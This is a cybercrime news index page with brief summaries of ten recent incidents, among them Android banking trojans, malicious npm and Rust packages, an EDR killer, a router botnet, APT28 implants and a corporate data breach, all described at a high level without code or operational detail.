Cybercrime
-
Six Android malware families steal data and hijack payments, researchers find
Researchers found six Android malware families that steal data and enable financial fraud. The trojans use fake Play Store listings, accessibility abuse and screen overlays to hijack transfers including real time attacks on Brazil’s Pix system.
-
Meta disables more than 150,000 accounts tied to Southeast Asia scam centres
Meta disabled more than 150,000 accounts tied to Southeast Asia scam centres and 21 arrests followed in Thailand, while new platform tools and a U.K. disruption unit aim to scale takedowns and reduce fraud.
-
UNC6426 used stolen npm keys to gain AWS administrator access in under 72 hours
UNC6426 leveraged keys from an August 2025 nx npm supply chain compromise to obtain a GitHub token and escalate to AWS administrator permissions in under 72 hours, leading to S3 data exfiltration and production resource destruction.
-
Five malicious Rust crates exfiltrated .env files and AI bot exploited GitHub Actions
Researchers found five malicious Rust crates on crates.io that exfiltrated .env files. Packages were removed. Users should rotate secrets, audit CI workflows and restrict outbound access to reduce supply chain risk.
-
BlackSanta EDR killer used in year long campaign targeting HR departments
A Russian speaking actor ran a year long campaign against HR departments deploying BlackSanta, an EDR killer that disables endpoint protections, uses DLL sideloading and vulnerable drivers to gain kernel level access.
-
KadNap botnet infects over 14,000 routers using peer-to-peer DHT to hide command infrastructure
KadNap, a router malware first seen in August 2025, has infected over 14,000 devices and uses a Kademlia DHT peer-to-peer network to hide command infrastructure and provide anonymized proxy services.
-
APT28 uses BEARDSHELL and COVENANT to surveil Ukrainian military
ESET documented APT28 use of BEARDSHELL and COVENANT to surveil Ukrainian military since April 2024. The implants use cloud storage for command and control and show links to earlier APT28 tooling.
-
Dutch advisory links Russian actors to Signal and WhatsApp account hijacking campaign
A Dutch AIVD advisory links Russian state-sponsored actors to phishing that hijacks Signal and WhatsApp accounts of officials and journalists. Attacks use fake support chatbots and malicious QR codes to seize or link devices and monitor messages.
-
Ericsson US discloses data breach after service provider hack
Ericsson Inc. notified individuals that attackers stole employee and customer data after a service provider was hacked. The provider detected the incident in April 2025. Texas filings list 4,377 affected.
-
Malicious npm package posing as OpenClaw installer deploys RAT, steals credentials
A JFrog technical analysis reported a malicious npm package posing as an OpenClaw installer. Uploaded March 3, 2026, the package installs a RAT and steals credentials, browser data, wallets and other sensitive macOS data.
